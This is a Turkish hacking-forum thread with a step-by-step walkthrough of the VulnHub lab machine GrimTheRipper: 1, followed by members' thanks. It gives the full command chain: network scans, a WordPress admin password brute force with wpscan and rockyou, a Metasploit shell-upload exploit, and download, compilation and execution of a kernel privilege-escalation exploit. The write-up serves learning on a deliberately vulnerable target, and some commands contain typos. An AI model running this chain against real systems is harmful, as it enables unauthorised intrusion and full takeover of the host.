GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

P4RS

Özel Üye

Üyelik tarihi:

01/2017

Nereden:

Ankara

Mesajlar:

5.139

Konular:

626

Teşekkür (Etti):

1779

Teşekkür (Aldı):

3708

Ticaret:

(0) %

2332

16-12-2019 22:48

Merhabalar TürkHackTeam ailesi, bugün sizlere "GrimTheRipper: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.

https://www.vulnhub.com/entry/grimtheripper-1,350/

Makine İsmi: GrimTheRipper: 1

Yayınlanma Tarihi: 20 Ağustos 2019

Yapımcı: Manish Chandra

Seri: GrimTheRipper

Açıklama: Hedefte Root yetkisine erişmek

Dosya Boyutu: 1.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta

İlk öncelikle hedefin IP adresini almamız lazım bunun için de

Kod:

sudo netdiscover

yazalım.

Hedefin IP adresini öğrendik.

NMAP taraması yaparak açık portlar hakkında bilgi sahibi olacağız. Bunun için

Kod:

nmap -A IP_ADRESİ

olarak yazalım. 22 ve 80 portlarının açık olduğunu gördük

Tarayıcımızı açalım ve IP adresini arayalım. Sitede herhangi bir şey bulamadık.

Siteyi kazımak için dirb aracını kullanacağız. Terminale

Kod:

dirb http://IP_adresi

yazalım.

robots.txt dosyasını ve index dosyalarını buldu bir bakalım.

Bizleri index2 kısmına yönlendiriyor.

İndex2 de ise bir görsel bizleri karşıladı.

Kaynak kodlarına bakayım dedim ve bir base64 şifresi karşıma çıktı

Bunu

Kod:

echo THpFd0f1UQXhNREU9IHRyeSBoYXJk | base64 -d

yazdım ve bir şifre daha verdi. Daha sonra bunu tekrar

Kod:

echo 'LzEwMTAxMDE=' | base64 -d

yazdığımda bana /1010101 verisini verdi.

Sitede IP_ADRESİ/1010101 olarak yazdığımda bir /wordpress olduğunu gördüm.

Wordpress görüntüsü bu şekildedir

Wpscan ile kullanıcı verilerini listelemek için

Kod:

wpscan --url http://IP_adresi/1010101/wordpress/ -e u

yazalım.

Kullanıcının admin olduğunu gördük.

Brute saldırı için rockyou.txt dosyasını kullanacağım. Terminale

Kod:

wpscan wpscan --url http://IP_adresi/1010101/wordpress/ -U admin -P rockyou.txt dosyasının uzantısı

Şifrenin [email protected] olduğunu öğrendik.

Ardından wp-admin-shell-upload exploitini kullanmak için msfconsole'a giriyoruz.

Kod:

msfconsole

yazalım.

Terminale

Kod:

search webapp

yazalım.

Burada 105. sıradakini kullanacağız.

Kullanmak için

Kod:

use 105

yazalım ve ayarlarını görmek için

Kod:

show options

yazalım.

Ayarlamamız gereken bazı ayarlar var bunları da

Kod:

set RHOSTS IP_ADRES 
set TARGETURI /1010101/wordpress/
set USERNAME admin
set PASSWORD [email protected]
exploti

yazarak giriş yapalım.

Kabuğa erişmek için ilk öncelikle

Kod:

shell

yazalım ardından da kabuğa erişim için

Kod:

python -c 'import pty;pty.spawn("/bin/bash")'

yazalım ve kabuğa erişelim. Ardından Linux bilgilerini almak için

Kod:

lsb_release -a

yazarak Linux bilgilerini aldık.

Ardından searchsploit ile kernel exploiti aramaya koyuldum. Terminale

Kod:

searchsploit Ubuntu 12.04

yazdım ve kırmızı işaretle aldığım kısmında ki dosyayı almak için

Kod:

searchsploit -m 37292.c

yazdım. Ardından ağı açarak hedef makineden dosyayı indirmek için

Kod:

python -m SimpelHTTPServer

yazdım.

Ardından exploit ile giriş yaptığımız terminale gelerek

Kod:

cd /tmp
wget IP_adresi:8000/37292.c

yazarak dosyayı makineye indirdik.

Ardından dosyayı shell dosyasına çevirmek için

Kod:

gcc 37292.c -o shell

yazdık ve dosyaya tam yetki vermek için

Kod:

chmod 777 shell

yazdık. Ardından shell dosyasını çalıştırmak için

Kod:

./shell

yazalım. Shell dosyası çalıştı peki hangi kullanıcıdayız?

id yazalım ve root yetkisinde olduğumuzu görelim.

Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla..

---------------------

https://i.hizliresim.com/7t0kzc.gif

Twitter

[email protected]

𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗

Konu P4RS tarafından (16-12-2019 23:04 Saat 23:04 ) değiştirilmiştir.

Alıntı Yap

x4807, OlcayMarufHan, PourLa, VaTanSevDalısı, By Ghost, ratio, AhmetKaan46, Rumexus, MyKrallife, prototyqe, xbaytar, Xowly, Rozz Teşekkür etti.

PourLa

Yardımsever

Üyelik tarihi:

03/2016

Nereden:

☪

Mesajlar:

1.668

Konular:

310

Teşekkür (Etti):

630

Teşekkür (Aldı):

872

Ticaret:

(0) %

16-12-2019 23:00

Ellerin dert görmesin hocam ellerine sağlık

---------------------

☪ PourLa ☪

Html/Css > Python > C ve C++

( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram

Alıntı Yap

By Ghost

Yardımsever

Üyelik tarihi:

07/2013

Nereden:

C:\Linux

Yaş:

Mesajlar:

939

Konular:

144

Teşekkür (Etti):

400

Teşekkür (Aldı):

457

Ticaret:

(0) %

16-12-2019 23:26

Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş

---------------------

Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--

Alıntı Yap

Bugs Bunny

Senior Hunter

Üyelik tarihi:

07/2016

Nereden:

MSFVenom

Mesajlar:

1.477

Konular:

115

Teşekkür (Etti):

Teşekkür (Aldı):

710

Ticaret:

(0) %

16-12-2019 23:27

Ellerine Sağlık P4RS

, Yine Mükemmel Olmuş.

---------------------

"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".

TELEGRAM

Alıntı Yap

ratio

Kıdemli Üye

Üyelik tarihi:

07/2013

Nereden:

Turk

Mesajlar:

2.462

Konular:

106

Teşekkür (Etti):

247

Teşekkür (Aldı):

890

Ticaret:

(0) %

17-12-2019 00:56

Elinize sağlık hocam.

Alıntı:

By Ghost´isimli üyeden Alıntı

Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş

Aynen "By Ghost"a katılıyorum. Bahsettiğimden biraz farklıymış. Ama detaylı ve güzel anlatmışsınız. Tekrardan elinize sağlık.

---------------------

The Golden Ratio is a special number found by dividing a line into two parts so that the longer part divided by smaller part is also equal to the whole length divided by the longer part.

Alıntı Yap

AhmetKaan46

Hesap Askıya Alındı

Üyelik tarihi:

02/2019

Nereden:

[email protected]:~#

Yaş:

Mesajlar:

1.409

Konular:

138

Teşekkür (Etti):

747

Teşekkür (Aldı):

468

Ticaret:

(0) %

17-12-2019 01:17

Eline sağlık hocam devamını bekliyorum zafitet çözümlerinin

Alıntı Yap

Rumexus

Uzman Üye

Üyelik tarihi:

01/2016

Nereden:

Mesajlar:

1.823

Konular:

113

Teşekkür (Etti):

1065

Teşekkür (Aldı):

825

Ticaret:

(0) %

17-12-2019 01:22

Elinize sağlık hocam mükemmel bir konu çok yararlı, kendini bu alanda geliştirecek arkadaşlar için.

--------------------- Acizler için imkansız, korkaklar için inanılmaz gözüken şeyler kahramanlar için idealdir.

Alıntı Yap

stayhigh

Katılımcı Üye

Üyelik tarihi:

09/2019

Nereden:

Mars

Mesajlar:

641

Konular:

152

Teşekkür (Etti):

399

Teşekkür (Aldı):

743

Ticaret:

(0) %

17-12-2019 01:51

Hocam ellerinize sağlık

Alıntı Yap

CrazyExelans

Katılımcı Üye

Üyelik tarihi:

08/2017

Nereden:

Burning Hâll

Mesajlar:

923

Konular:

Teşekkür (Etti):

Teşekkür (Aldı):

561

Ticaret:

(0) %

17-12-2019 13:08

Emeğine sağlık.

---------------------

Kod:

,
,    -------                                                  --------------
,      ◘The Ordinaryus, Father of White's, Prof. Doç. Dr. Sn. Abuzer Kömürcü Exelansları  R.I.P◘
,    -------                                                  --------------
,

Alıntı Yap

MyKrallife